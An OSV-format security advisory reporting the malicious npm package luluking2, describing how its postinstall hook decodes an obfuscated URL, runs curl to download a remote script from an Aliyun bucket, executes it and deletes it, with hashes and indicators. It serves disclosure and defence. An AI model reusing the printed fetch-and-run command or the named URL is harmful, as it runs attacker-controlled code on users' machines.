{"id":"MAL-2026-12398","summary":"Malicious code in luluking2 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (495a71c4dcddec545026181c7faeef59cf4c79b4816a148fb88c59c5465e8c97)\nOn npm install, the package's postinstall hook runs index.js, which reconstructs a URL from a char-code array (String.fromCharCode.apply on a numeric literal array with _0x-prefixed identifiers) resolving to https://aone-kit.oss-cn-beijing.aliyuncs.com/plugins/crypto.js. It shells out via execSync to `curl -sL -o \".cache\" \"\u003curl\u003e\"`, then require()s the downloaded file and deletes it. The destination URL, the filename, and the curl command string are all obfuscated via char-code reconstruction to hide the network destination from source inspection. The remote content is attacker-mutable (an Aliyun OSS bucket) and is executed inside the installing Node process on every install. Package metadata is placeholder-level with no legitimate declared purpose that would justify fetching and executing remote code at install time.\n","modified":"2026-08-05T13:35:35.867239354Z","published":"2026-08-05T13:01:55Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-08-05T13:01:55Z","sha256":"495a71c4dcddec545026181c7faeef59cf4c79b4816a148fb88c59c5465e8c97","source":"amazon-inspector","versions":["0.0.1"],"id":"IN-MAL-2026-014855","import_time":"2026-08-05T13:08:51.298380793Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/luluking2/v/0.0.1"}],"affected":[{"package":{"name":"luluking2","ecosystem":"npm","purl":"pkg:npm/luluking2"},"versions":["0.0.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/luluking2/MAL-2026-12398.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"package_integrity":[{"filename":"luluking2-0.0.1.tgz","hashes":{"sha512_sri":"sha512-aeBZYKw7AQUNNsDFimwLMd8lUSZbaRVIT4MainUUHU6w5TPPmt+lDMi0Lq0we75DV6wUfLXhHAK/d+ijAd7sbw==","sha1":"2b609565f5f12021d2de97933ab172cc9aea0f8e"}}],"evidence_files":[{"sha256":"b0eac2c994e2b642171cd1e2cad8c064855d4983ab06f2da762059607ac58656","tlsh":"3611909707e11b71fd6004df465bc406a4a7c5133250e9e4faec895f9f9a820ed916b0","path":"index.js"}]}}}],"schema_version":"1.8.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}